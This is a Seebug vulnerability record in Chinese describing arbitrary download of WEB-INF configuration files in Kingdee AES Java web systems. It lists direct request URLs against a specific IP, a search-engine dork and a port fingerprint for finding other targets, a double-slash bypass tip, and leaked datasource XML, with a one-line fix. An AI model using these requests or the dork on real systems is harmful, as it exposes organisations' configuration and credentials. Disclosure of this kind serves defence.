金蝶AES系统Java web配置文件敏感信息泄露漏洞

2016-03-10T00:00:00
ID SSV:90979
Type seebug
Reporter hhxx
Modified 2016-03-10T00:00:00

Description

0x01 漏洞框架

金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用

官方主页:www.kingdee.com

客户案例:

0x02 漏洞利用

金蝶AES系统Java web配置文件可任意下载。

portal下的配置文件:

http://58.63.253.42/portal/WEB-INF/web.xml

http://58.63.253.42/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-basic.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-datasource.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-frame.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-pub.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-perm.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-setting.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-page.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-personal.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-portlet.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-weibo.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-report.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-sms.xml http://58.63.253.42/portal/WEB-INF/sso/applicationContext-ssoClient.xml

eassso下的配置文件:

检索关键字: inurl:/eassso/

可以找到了同类系统,以下地址手工验证存在漏洞(该系统较多监听6888端口,可以根据这个特征定位),若一个斜杠下载不成功,可尝试加双斜杠:

http://58.63.253.42/eassso//WEB-INF/web.xml

http://58.63.253.42/eassso//WEB-INF/applicationContext.xml

http://58.63.253.42/easssoWEB-INF/deployerConfigContext.xml

读取数据源配置 .../portal/WEB-INF/config/spring/applicationContext-datasource.xml, 得到:

``` <beans default-lazy-init="true" default-autowire="no" default-dependency-check="none">

<bean id="dataSource" class="com.kingdee.portal.biz.core.datacenter.KDPortalDataSource">

&lt;property name="dataSource"&gt;

  &lt;ref bean="MZROS" /&gt;

&lt;/property&gt;

</bean>

<bean id="MZROS" class="org.springframework.jndi.JndiObjectFactoryBean">

&lt;property name="jndiName" value="jdbc/MZROS" /&gt;

</bean>

</beans> ```

0x03 修复方案

禁止通过web访问